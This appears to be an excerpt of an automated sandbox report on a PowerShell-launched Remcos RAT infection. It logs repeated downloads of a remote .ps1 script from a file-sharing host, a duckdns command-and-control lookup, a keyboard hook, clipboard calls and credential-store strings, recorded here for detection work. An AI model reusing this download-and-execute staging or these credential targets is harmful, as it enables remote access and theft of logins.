              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49980 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49987 -> 168.119.145.117:443
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: powershell.exe, powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: powershell.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: powershell.exe, 00000007.00000002.1530323108.0000000003748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2 equals www.facebook.com (Facebook)
              Source: powershell.exe, 00000007.00000002.1530323108.0000000003748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2 equals www.yahoo.com (Yahoo)
              Source: powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: 0x0.st
              Source: global trafficDNS traffic detected: DNS query: abokirem.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: powershell.exe, 00000014.00000002.1775216793.0000000007410000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.3145606062.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 0000003A.00000002.3329140310.0000000007491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: powershell.exe, 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.1784027157.0000000008C9C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.1954330388.0000000008DBC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000020.00000002.2116165246.0000000008B7C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000025.00000002.2296515608.0000000008C7C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000002A.00000002.2515947583.000000000942C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000002F.00000002.2705660969.0000000008D1C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000035.00000002.3010363046.0000000008EBC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000003A.00000002.3443687584.0000000008D0C000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: powershell.exe, 0000000F.00000002.1613577949.0000000004D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1741717707.0000000004BF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1878755442.0000000004E25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2017270277.00000000049B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2156116854.0000000004B2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2310818251.0000000005400000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2452107366.0000000004DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2657516198.0000000004FDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2818183841.0000000004BEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2987236011.0000000004CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: powershell.exe, powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: powershell.exe, 0000003A.00000002.3392420858.0000000008718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: powershell.exe, 00000007.00000002.1529489878.00000000030A4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 0000000F.00000002.1613577949.0000000004E75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1741717707.0000000004D44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1878755442.0000000004F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2017270277.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2156116854.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2310818251.0000000005544000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2452107366.0000000004F24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2657516198.0000000005124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2818183841.0000000004D34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2987236011.0000000004E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st
              Source: powershell.exe, 0000003F.00000002.2987236011.0000000004E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st/8KuV.ps1
              Source: powershell.exe, 0000000F.00000002.1613577949.0000000004D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1741717707.0000000004BF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1878755442.0000000004E25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2017270277.00000000049B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2156116854.0000000004B2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2310818251.0000000005400000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2452107366.0000000004DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2657516198.0000000004FDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2818183841.0000000004BEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2987236011.0000000004CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBlq
              Source: powershell.exe, 00000007.00000002.1529634326.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
              Source: powershell.exe, 00000007.00000002.1530323108.0000000003748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfh
              Source: powershell.exe, 00000007.00000002.1529634326.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: powershell.exe, 00000007.00000002.1529634326.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: powershell.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49857 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49936 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49975 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49978 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49979 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49980 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49981 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49982 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49983 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49984 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49985 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49986 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49987 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49988 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49989 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49990 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0041183A OpenClipboard,GetLastError,DeleteFileW,7_2_0041183A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_0040987A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004098E2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,8_2_00406DFC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_00406E9F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004068B5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_004072B5
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000035.00000002.3010363046.0000000008EB7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1875086180.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.3145606062.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2656381876.0000000007361000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2515947583.0000000009427000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003F.00000002.2953604842.0000000002E5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2705660969.0000000008D17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2116165246.0000000008B77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1627813047.0000000008888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2296515608.0000000008C77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1948275505.0000000008576000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2273047650.0000000007280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2110059731.000000000863D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2454927477.0000000007B30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.1780515876.0000000008670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.4187297645.00000000080A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003A.00000002.3443687584.0000000008D07000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2100059153.0000000007190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2489969413.00000000089F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2671409010.000000000741E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.1784027157.0000000008C97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003F.00000002.3856215786.0000000008704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1954330388.0000000008DB7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000035.00000002.2648336815.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2287089513.00000000081C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
